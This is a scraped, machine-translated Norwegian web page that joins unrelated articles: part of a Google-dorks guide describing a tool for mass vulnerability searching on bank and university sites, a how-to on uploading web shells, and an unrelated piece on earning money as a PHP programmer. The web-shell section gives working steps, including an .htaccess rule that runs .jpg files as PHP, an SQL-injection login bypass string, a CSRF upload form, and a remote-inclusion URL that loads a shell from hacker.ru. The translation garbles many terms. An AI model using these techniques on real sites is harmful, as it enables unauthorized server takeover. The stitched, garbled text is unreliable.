<br><i>dcid=</i><i>bn=</i><i>pin</i><i>kode=</i><br></td> </tr><tr><td width="168">Nettverks- eller sårbarhetsdata <br></td> <td width="190">Informasjon som ikke er direkte relatert til nettressursen, men som påvirker nettverket eller andre ikke-webtjenester <br></td> <td width="284">Finn skript for automatisk proxy-konfigurasjon som inneholder informasjon om det interne nettverket: <br><i>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Sider som inneholder påloggingsportaler <br></td> <td width="190">Sider som inneholder påloggingsskjemaer <br></td> <td width="284">saplogon nettsider: <br><i>intext:"2016 SAP AG. Alle rettigheter forbeholdt." intitle: "Pålogging"</i><br></td> </tr><tr><td width="168">Ulike elektroniske enheter <br></td> <td width="190">Skrivere, rutere, overvåkingssystemer, etc. <br></td> <td width="284">Finn skriverkonfigurasjonspanelet: <br><i>intitle:"</i><i>hk</i><i>laserjet"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>sett_</i><i>config_</i><i>enhetsinformasjon.</i><i>htm</i><br></td> </tr><tr><td width="168">Rådgivning og sårbarheter <br></td> <td width="190">Nettsteder på sårbare CMS-versjoner <br></td> <td width="284">Finn sårbare plugins der du kan laste opp en vilkårlig fil til serveren: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Dorks er oftere fokusert på å søke på alle internettsider. Men ingenting hindrer deg i å begrense søkeomfanget på noen nettsteder. <br>Hvert Google-søk kan fokuseres på et spesifikt nettsted ved å legge til søkeordet «site:somesite.com» i søket. Dette nøkkelordet kan legges til alle narr. <p><b>Automatisering av søk etter sårbarheter</b><br>Dette er hvordan ideen ble født om å skrive et enkelt verktøy som automatiserer søket etter sårbarheter ved hjelp av en søkemotor (google) og er avhengig av Google Hack Database.</p><p>Verktøyet er et skript skrevet i nodejs med phantomjs. For å være presis tolkes manuset av phantomjs selv. <br>Phantomjs er en fullverdig nettleser uten GUI, kontrollert av js-kode og med en praktisk API. <br>Verktøyet fikk et ganske forståelig navn - dorks. Ved å kjøre den på kommandolinjen (uten alternativer), får vi kort hjelp med flere eksempler på bruk: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Figur 1 - Liste over hoveddorks-alternativer</p><p>Den generelle syntaksen til verktøyet er: dork "kommando" "alternativliste". <br>En detaljert beskrivelse av alle alternativene er presentert i tabell 4.</p><p>Tabell 4 - Dorks-syntaks <br></p><table border="1"><tbody><tr><td width="214"><b>Team</b><br></td> <td width="214"><b>Alternativ</b><br></td> <td width="214"><b>Beskrivelse</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Skriv ut en nummerert liste over skurkekategorier Google Hack Database <br></td> </tr><tr><td width="214">-c "kategorinummer eller navn" <br></td> <td width="214">Last dører i den angitte kategorien etter nummer eller navn <br></td> </tr><tr><td width="214">-q "frase" <br></td> <td width="214">Last ned dorks funnet etter forespørsel <br></td> </tr><tr><td width="214">-o "fil" <br></td> <td width="214">Lagre resultatet i en fil (bare med -c|-q alternativer) <br></td> </tr><tr><td rowspan="8" width="214">Google <br></td> <td width="214">-d "dork" <br></td> <td width="214">Angi en vilkårlig dork (alternativet kan brukes mange ganger, kombinasjon med -D-alternativet er tillatt) <br></td> </tr><tr><td width="214">-D "fil" <br></td> <td width="214">Bruk dorks fra fil <br></td> </tr><tr><td width="214">-s "side" <br></td> <td width="214">Sett nettsted (alternativet kan brukes mange ganger, kombinasjon med alternativ -S er tillatt) <br></td> </tr><tr><td width="214">-S "fil" <br></td> <td width="214">Bruk nettsteder fra en fil (dorks vil bli søkt for hvert nettsted uavhengig) <br></td> </tr><tr><td width="214">-f "filter" <br></td> <td width="214">Angi flere søkeord (blir lagt til hver dork) <br></td> </tr><tr><td width="214">-t "antall ms" <br></td> <td width="214">Intervall mellom forespørsler til google <br></td> </tr><tr><td width="214">-T "antall ms" <br></td> <td width="214">Tidsavbrudd hvis en captcha oppdages <br></td> </tr><tr><td width="214">-o "fil" <br></td> <td width="214">Lagre resultatet i en fil (bare de sporene som noe ble funnet for vil bli lagret) <br></td> </tr></tbody></table><br>Ved å bruke ghdb-kommandoen, kan du få alle narrene fra exploit-db ved vilkårlig forespørsel, eller spesifisere hele kategorien. Hvis du spesifiserer kategori 0, vil hele databasen bli lastet ut (ca. 4,5 tusen dorks). <p>Listen over kategorier som for øyeblikket er tilgjengelig er presentert i figur 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Figur 2 - Liste over tilgjengelige GHDB-dork-kategorier</p><p>Google-teamet vil erstatte hver dork i Googles søkemotor og analysere resultatet for treff. Banene der noe ble funnet vil bli lagret i en fil. <br>Verktøyet støtter forskjellige søkemoduser: <br>1 dork og 1 side; <br>1 dork og mange nettsteder; <br>1 nettsted og mange tullinger; <br>mange nettsteder og mange tullinger; <br>Listen over narr og nettsteder kan spesifiseres enten gjennom et argument eller gjennom en fil.</p><p><b>Demonstrasjon av arbeid</b><br>La oss prøve å se etter eventuelle sårbarheter ved å bruke eksemplet med å søke etter feilmeldinger. Ved kommando: dorks ghdb –c 7 –o errors.dorks vil alle kjente dorks i kategorien "Feilmeldinger" lastes inn som vist i figur 3. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Figur 3 – Laster inn alle kjente dorks i kategorien "Feilmeldinger".</p><p>Dorks lastes ned og lagres i en fil. Nå gjenstår det bare å "sette" dem på et sted (se figur 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Figur 4 – Søk etter sårbarheter for nettstedet av interesse i Google-cachen</p><p>Etter en tid oppdages flere sider som inneholder feil på området som studeres (se figur 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Figur 5 – Feilmeldinger funnet</p><p>Som et resultat, i result.txt-filen får vi en fullstendig liste over dorks som fører til feilen. <br>Figur 6 viser resultatet av søk etter nettstedsfeil. <br><br>Figur 6 – Feilsøkeresultat</p><p>I hurtigbufferen for denne dork vises en fullstendig tilbakesporing som avslører de absolutte banene til skriptene, innholdsstyringssystemet for nettstedet og databasetypen (se figur 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Figur 7 – utlevering av informasjon om nettstedets design</p><p>Det er imidlertid verdt å tenke på at ikke alle tullinger fra GHDB gir sanne resultater. Det kan også hende at Google ikke finner et eksakt samsvar og viser et lignende resultat.</p><p>I dette tilfellet er det lurere å bruke din personlige liste over tullinger. For eksempel er det alltid verdt å se etter filer med "uvanlige" utvidelser, eksempler på disse er vist i figur 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Figur 8 – Liste over filutvidelser som ikke er typiske for en vanlig nettressurs</p><p>Som et resultat, med kommandoen dorks google –D extensions.txt –f bank, begynner Google fra den aller første forespørselen å returnere nettsteder med «uvanlige» filutvidelser (se figur 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Figur 9 – Søk etter "dårlige" filtyper på banknettsteder</p><p>Det er verdt å huske på at Google ikke godtar forespørsler som er lengre enn 32 ord.</p><p>Bruke kommandoen dorks google –d intext:”error|warning|notice|syntax” –f university <br>Du kan se etter PHP-tolkefeil på pedagogiske nettsteder (se figur 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Figur 10 – Finne PHP-kjøretidsfeil</p><p>Noen ganger er det ikke praktisk å bruke en eller to kategorier av dorks. <br>Hvis det for eksempel er kjent at siden kjører på Wordpress-motoren, trenger vi WordPress-spesifikke moduler. I dette tilfellet er det praktisk å bruke Google Hack Database-søk. Kommandoen dorks ghdb –q wordpress –o wordpress_dorks.txt vil laste ned alle dorks fra Wordpress, som vist i figur 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Figur 11 – Søk etter Dorks relatert til Wordpress</p><p>La oss gå tilbake til bankene igjen og bruke kommandoen dorks google –D wordpress_dords.txt –f bank for å prøve å finne noe interessant relatert til Wordpress (se figur 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Figur 12 – Søk etter Wordpress-sårbarheter</p><p>Det er verdt å merke seg at søket på Google Hack Database ikke aksepterer ord som er kortere enn 4 tegn. For eksempel, hvis nettstedets CMS ikke er kjent, men språket er kjent - PHP. I dette tilfellet kan du filtrere det du trenger manuelt ved å bruke pipen og systemsøkeverktøyet dorks –c all | findstr /I php > php_dorks.txt (se figur 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Figur 13 – Søk i alle dorks der PHP er nevnt</p><p>Søke etter sårbarheter eller noe sensitiv informasjon i en søkemotor bør bare gjøres hvis det er en betydelig indeks på dette nettstedet. For eksempel, hvis et nettsted har 10-15 indekserte sider, er det dumt å søke etter hva som helst på denne måten. Det er enkelt å sjekke indeksstørrelsen - bare skriv inn "site:somesite.com" i Googles søkefelt. Et eksempel på et nettsted med utilstrekkelig indeks er vist i figur 14. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Figur 14 – Kontrollere størrelsen på nettstedindeksen</p><p>Nå om det ubehagelige... Fra tid til annen kan Google be om en captcha - det er ingenting du kan gjøre med det - du må angi den. For eksempel, når du søkte gjennom kategorien "Feilmeldinger" (90 dorks), dukket captchaen opp bare én gang.</p><p>Det er verdt å legge til at phantomjs også støtter arbeid gjennom en proxy, både via http og socks-grensesnitt. For å aktivere proxy-modus, må du fjerne kommentaren til den tilsvarende linjen i dorks.bat eller dorks.sh.</p><p>Verktøyet er tilgjengelig som kildekode</p> <br>I denne artikkelen vil jeg snakke om de mest brukte metodene for å laste opp et skall til et nettsted. <b>Web-skall</b> er et slags ondsinnet skript (program) som angripere bruker for å kontrollere nettsteder eller servere. <p><b>Metode 1</b><br>Finn et skjema på nettsiden for opplasting av filer/bilder. La oss si at vi ikke klarte å hacke nettstedets administrasjonspanel og vi prøver å oversvømme skallet vårt med <b>extension.php.jpg .</b> Hvis det lykkes, vil vi se et hvitt vindu i stedet for bildet, vi høyreklikker og følger lenken. Ved feil kan vi bruke chrome-utvidelsen <b>tukle data</b>. Den lar deg avskjære og endre forespørselen som du vil. Hvis nettstedet sjekker filtypen, kan vi først laste opp <b>.htaccess</b> fil med innhold: <br>AddType application/x-httpd-php .jpg <br>Denne kommandoen vil kjøre jpg-filer som php. <br><b>Detaljerte videoinstruksjoner:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Videoinstruksjoner for <b>installasjon av sabotasjedata:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Metode 2</b><br>Bruk programmet til å søke etter adminpaneler på nettstedet - https://github.com/bdblackhat/admin-panel-finder. Når programmet har funnet adminpanelet kan vi prøve sql-injection. I innloggings- og passordfeltet til nettstedet skriver vi inn koden: <br><p>" eller "1"="1 " ELLER 1=1/*</p><p>Hvis det fungerer, kommer vi til administrasjonspanelet og <b>Vi fortsetter i henhold til metode 1.</b> Hvis det ikke er noen sql-injeksjon i admin-panelet på nettstedet, kan vi prøve å feilsøke det eller finne en utnyttelse for dette CMS. <br><b>Detaljerte videoinstruksjoner:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Metode 3</b><br>I metode 3 vil vi se etter sql-injeksjon på selve siden. Vi kan gjøre dette manuelt eller bruke sqlmap. Det er nok emner på forumet om hvordan man utfører injeksjoner, så jeg kommer langveisfra. Så nå har vi allerede funnet en tabell med administratorens pålogging og passord, dekrypter hashen, gå til administrasjonspanelet og glede deg. Men la oss si at vi ikke kunne dekryptere passordet og alt gikk galt, da må vi sjekke privilegiene til brukeren vår <b>. </b> Vi sjekker privilegiene og laster inn mini-skallet. <b>Av en eller annen grunn, når jeg vil lime inn koden, gir nettstedet meg en feilmelding.</b><p><b>Metode 4</b><br>Metode 4 innebærer et csrf-angrep. I koden nedenfor må vi erstatte <b>http://</b> til mållenken vår. <b>Velg skall</b> og trykk på knappen <b>laste opp.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Laste opp"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Metode 5</b><br>Finn ut mer om målet ditt og finn en utnyttelse. Det er en veldig interessant nettside for dette - https://www.exploit-db.com. Ingen har kansellert den massive hackingen av nettsteder gjennom sårbarheter, men det er allerede en artikkel om dette på skjemaet. <p>Det er mange flere måter å fylle et skall, og det er ingen vits i å snakke om hver enkelt. Hvis du vil øve, så installer dvwa - det er et program utviklet for å hjelpe sikkerhetseksperter med å teste ferdighetene og verktøyene sine i et juridisk miljø.</p><p><b>Metode 6 <br><b>Php-injeksjon</b>- dette er en form for angrep på et nettsted når angriperen injiserer PHP-koden sin i den angrepne PHP-applikasjonen.</b><br>www.site.ru?page=home.html <br>Ved å utføre kommandoen vil vi laste home,html-siden. Nå skal vi prøve å laste inn et ondsinnet skall. <br>www.site.ru?page=http://hacker.ru/webshell.php <br>Dork: <b>Inurl:side=</b></p><p>Det er også en måte å finne et allerede lastet skall ved å bruke perl</p> <p> » </p><h1>Hvordan kan en PHP-programmerer tjene gode penger hjemme?</h1><p>Mest vellykkede PHP-programmerere tjener gode penger hjemmefra. I begynnelsen av enhver inntekt oppstår det vanskeligheter. Det hender at vanskeligheter og mangel på kunnskap om inntjeningsmetoder fraråder alle ønsker om å tjene penger hjemme, og da ser programmerere etter muligheten til å jobbe på kontorer, hvor det er en større garanti for at penger kan mottas hver måned, og profesjonell vekst er mulig.</p><p>Men å kunne jobbe hjemmefra har flere fordeler enn ulemper.</p><h3>proffer</h3><p>Du vil jobbe for deg selv. Ingen vil sparke deg, du vil kunne fordele din egen timeplan eller jobbe til det tidspunktet du ønsker.</p><p>Du velger selv en måte å tjene penger på ved hjelp av programmering, som for det første vil øke interessen din for arbeidet, og for det andre har du stor handlefrihet. Du trenger ikke jobbe med noe du ikke liker. Det er også flere muligheter for å kombinere måter å tjene penger på.</p><h3>Minuser</h3><p>Det vil være vanskelig i begynnelsen, og for å få de første pengene for arbeidet ditt må du investere mye krefter og tid. Og for at det skal bli overskudd må du hele tiden utvikle deg og ha tålmodighet og fordele timeplanen din riktig slik at du har nok tid til å fullføre arbeidet i tide.</p><h3>Tjen penger på skriptene dine</h3><p>Det finnes mange forskjellige skript på Internett som folk enkelt kan laste ned og installere på nettsiden deres. Du kan skrive ditt eget unike manus, og det er to alternativer for hvordan du kan tjene penger på manuset ditt. Selg det eller legg det ut gjennom fildelingstjenester. Du kan også bruke to alternativer. For eksempel lette skript, men samtidig er det også veldig viktig å plassere gjennom fildelingstjenester akkurat de skriptene som vil være etterspurt. For å gjøre dette må skriptene være etterspurt slik at folk laster dem ned for deres behov.</p><p>Store manus kan selges til rimelige priser. Du kan legge ut en annonse på forum, eller hvis du har din egen personlige blogg eller nettside, legge inn en annonse for salg av manus.</p><p>Uansett hvilket alternativ du velger, plasser skriptet i arkivet og sørg for å inkludere detaljerte instruksjoner og kontaktinformasjon om deg selv. Sørg for å gi støtte, for det er viktig for deg å jobbe for deg selv. Tross alt må du bli anbefalt eller få lastet ned skriptene dine. De skal være av høy kvalitet. Hvis en person ber deg om hjelp, forklar ham høflig om manuset eller hjelp ham med å installere det. Skriptene dine bør ha kommentarer. Hva hver funksjon har ansvar for osv. Tross alt kan en person lett bli forvirret i koden din, der det ikke er notasjoner.</p><h3>Egne og felles prosjekter</h3><p>Det er bra å lage din egen nettside for å tjene penger. Det er mange muligheter for å tjene penger med nettsiden din. Hvis du promoterer det godt, kan du legge ut skript der for salg. Samarbeidsprosjekter vil utvide dine evner, noe som er bra for suksess med hjemmeprogrammering. Se derfor etter partnere eller ikke avslå tilbud om å lage et prosjekt sammen.</p><p>Du bør sørge for å legge til funksjoner som fanger oppmerksomhet på nettstedet ditt. Siden kan ha et vanlig, enkelt utseende, men samtidig med sin egen vri. En personlig nettside bidrar til å øke antallet kunder. De vil se hvordan skriptene dine fungerer, hvis de ikke tar for lang tid å laste, er interessante å bruke, og viktigst av alt, originale, ulikt noe annet. Da vil du finne suksess.</p><h3>Inntjening på bestillinger</h3><p>For å gjøre dette er det bare å registrere seg i ulike børser for frilansere og se etter bestillinger. Vis ut din portefølje av fullført arbeid. Men vær forsiktig, det er uærlige mennesker i verden, og for at du ikke skal falle for bedrag, vis først verket som ligger på serveren din (forresten, i dette tilfellet må du leie en vps http:/ /nkvd.pro/vps/), og hvis de betaler deg en del, så overfør halvparten til serveren deres, og gjør det samme med den andre delen. Denne metoden for å tjene penger anses som lønnsom, men avhenger av graden av kunnskap og ferdigheter. Det avhenger også av tilbakemeldingene fra kundene dine. For å lykkes med denne metoden for å tjene penger, gjør arbeidet ærlig og effektivt. Du må kunne kommunisere med kunder, tydelig forklare hva du kan og ikke kan gjøre.</p><p>Dette er ikke hele listen over inntekter for en php-programmerer, men takket være disse metodene for å tjene penger, som er skrevet ovenfor, kan du allerede tjene penger uten å forlate hjemmet. I den innledende fasen vil dette være en stor prestasjon. Det viktigste er ikke å stoppe der. Stadig forbedre og lage prosjekter som vil gi deg ikke bare god inntekt, men også glede.</p> <br><b>om forfatteren</b> <br><p>Hvordan kan en PHP-programmerer tjene gode penger hjemme?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Relaterte publikasjoner</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/d356145b8d32a4e43aa5ed76e39606a7.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/no/vstupit-v-gruppu-po-zarabotku-deneg-kak-zarabotat.html">Hvordan tjene penger på VKontakte på siden din og uten det - virkelig arbeidsmetoder</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/c140bebb4b361b4583c11c49e770bc39.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/no/kak-pomenyat-temu-dlya-vkontakte-v-yandeks-brauzere-kak-pomenyat-temu-v-kontakte.html">Hvordan endre temaet for VKontakte i Yandex</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/40e1db5c5747911f9c43c259f44aeadb.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/no/nastroika-velokompyutera-na-diametr-koles-26-2-2-podklyuchenie-velokompyutera-kak.html">Stille inn sykkelcomputeren for hjuldiameter 26 2</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/programs/">Programmer</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/devices/">Enheter</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/browsers/">Nettlesere</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/reviews/">Anmeldelser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/reviews/">Anmeldelser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/setup/">Innstillinger</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/torrent/">Torrent</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/editors/">Redaktører</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/instagram/">Instagram</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">De siste notatene</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/5e60cc62a5f20ab07a340013922f0d2c.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Den minste datamaskinen i verden: bilde, beskrivelse, vurdering Den minste PC-en i verden" / loading=lazy loading=lazy> <span class="cat">Programmer</span></div> <a href="https://storerarity.ru/no/samyi-malenkii-kompyuter-v-mire-foto-opisanie-reiting.html">Den minste datamaskinen i verden: bilde, beskrivelse, vurdering Den minste PC-en i verden</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/cdb555606d94b8ae1d51c87fc743c991.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Hvordan installere og registrere Yula-applikasjonen" / loading=lazy loading=lazy> <span class="cat">Programmer</span></div> <a href="https://storerarity.ru/no/kak-postavit-prilozhenie-yula-zaregistrirovatsya-prilozhenie-yula-ustanovka.html">Hvordan installere og registrere Yula-applikasjonen</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/af70d4bfa7ecf603e659893b5979f8d6.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Smartphone Samsung Grand Duos: egenskaper, anmeldelser Samsung galaxy grand duos beskrivelse" / loading=lazy loading=lazy> <span class="cat">Programmer</span></div> <a href="https://storerarity.ru/no/samsung-galaxy-grand-duos-bolshoi-i-moshchnyi-smartfon-samsung-grand-duos-harakteristiki-otzyvy-sam.html">Smartphone Samsung Grand Duos: egenskaper, anmeldelser Samsung galaxy grand duos beskrivelse</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Datamaskiner for alle - Oppsett, installasjon, gjenoppretting</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/programs/">Programmer</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/devices/">Enheter</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/browsers/">Nettlesere</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/reviews/">Anmeldelser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/reviews/">Anmeldelser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/setup/">Innstillinger</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/no/category/torrent/">Torrent</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>